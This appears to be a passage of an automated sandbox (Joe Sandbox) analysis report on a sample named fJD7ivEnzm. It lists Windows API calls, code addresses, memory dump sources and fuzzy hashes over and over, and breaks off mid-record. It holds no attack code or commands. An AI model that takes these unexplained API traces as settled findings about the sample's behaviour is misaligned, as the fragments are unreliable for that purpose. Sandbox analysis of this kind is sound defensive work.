                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: ICMP.DLL$IcmpCreateFile
                                                                          • API String ID: 2574300362-275556492
                                                                          • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                          • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                          • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                          • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                          • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: ICMP.DLL$IcmpSendEcho
                                                                          • API String ID: 2574300362-58917771
                                                                          • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                          • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                          • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                          • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                          • API String ID: 2574300362-4033151799
                                                                          • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                          • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                          • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                          • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430DD3
                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00430DE5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                          • API String ID: 2574300362-1816364905
                                                                          • Opcode ID: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                                                          • Instruction ID: 24515a708fc6b3a38513646dac5635f6d90a943ae1c03eade4216686bbe3791e
                                                                          • Opcode Fuzzy Hash: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                                                          • Instruction Fuzzy Hash: 51E0127154070A9BD7105FA5E91878A77D8DB14751F10882AFD45E2650D7B8E480C7BC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                          • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                                                          • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                          • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                          • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                          • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                          • VariantClear.OLEAUT32(?), ref: 00479650
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$AllocClearCopyInitString
                                                                          • String ID:
                                                                          • API String ID: 2808897238-0
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                          • __itow.LIBCMT ref: 004699CD
                                                                            • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                          • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                          • __itow.LIBCMT ref: 00469A97
                                                                          Similarity
                                                                          • API ID: MessageSend$__itow
                                                                          • String ID:
                                                                          • API String ID: 3379773720-0
                                                                          APIs
                                                                          • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                          • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                          Similarity
                                                                          • API ID: Window$ClientMoveRectScreen
                                                                          • String ID:
                                                                          • API String ID: 3880355969-0
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                          • String ID:
                                                                          • API String ID: 2782032738-0
                                                                          APIs
                                                                          • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                          • GetWindowRect.USER32(?,?), ref: 00441722
                                                                          • PtInRect.USER32(?,?,?), ref: 00441734
                                                                          • MessageBeep.USER32(00000000), ref: 004417AD
                                                                          Similarity
                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                          • String ID:
                                                                          • API String ID: 1352109105-0
                                                                          APIs
                                                                          • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                          • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                          • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                          • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                          Similarity
                                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                                          • String ID:
                                                                          • API String ID: 3321077145-0
                                                                          APIs
                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                          • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                          • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                          • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                          Similarity
                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                          • String ID:
                                                                          • API String ID: 3058430110-0
                                                                          APIs
                                                                          • GetParent.USER32(?), ref: 004503C8
                                                                          • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                          • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                          • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                          Similarity
                                                                          • API ID: Proc$Parent
                                                                          • String ID:
                                                                          • API String ID: 2351499541-0
                                                                          APIs
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                          • TranslateMessage.USER32(?), ref: 00442B01
                                                                          • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                          Similarity
                                                                          • API ID: Message$Peek$DispatchTranslate
                                                                          • String ID:
                                                                          • API String ID: 1795658109-0
                                                                          APIs
                                                                          • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                                            • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                            • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                            • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                          • GetCaretPos.USER32(?), ref: 004743B2
                                                                          • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                          • GetForegroundWindow.USER32 ref: 004743EE
                                                                          Similarity
                                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                          • String ID:
                                                                          • API String ID: 2759813231-0
                                                                          • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                          • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                          • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                          • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                          APIs
                                                                            • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                          • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                          • _wcslen.LIBCMT ref: 00449519
                                                                          • _wcslen.LIBCMT ref: 00449526
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend_wcslen$_wcspbrk
                                                                          • String ID:
                                                                          • API String ID: 2886238975-0
                                                                          • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                          • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                                          • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                          • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __setmode$DebugOutputString_fprintf
                                                                          • String ID:
                                                                          • API String ID: 1792727568-0
                                                                          • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                          • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                          • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                          • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                          APIs
                                                                            • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Long$AttributesLayered
                                                                          • String ID:
                                                                          • API String ID: 2169480361-0
                                                                          • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                          • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                          • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                          • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                          APIs
                                                                            • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                            • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                            • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                          • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                          • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                          • String ID: cdecl
                                                                          • API String ID: 3850814276-3896280584
                                                                          • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                                          • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                          • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                                          • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                          APIs
                                                                            • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                          • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                                          • _memmove.LIBCMT ref: 0046D475
                                                                          • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                                          • String ID:
                                                                          • API String ID: 2502553879-0
                                                                          • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                          • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                                          • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                          • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                                          APIs
                                                                          • SendMessageW.USER32 ref: 00448C69
                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                                          • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                                          • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$LongWindow
                                                                          • String ID:
                                                                          • API String ID: 312131281-0
                                                                          • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                          • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                                          • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                          • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                                          APIs
                                                                          • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                          • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                          • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastacceptselect
                                                                          • String ID:
                                                                          • API String ID: 385091864-0
                                                                          • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                          • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                          • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                          • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                          APIs
                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
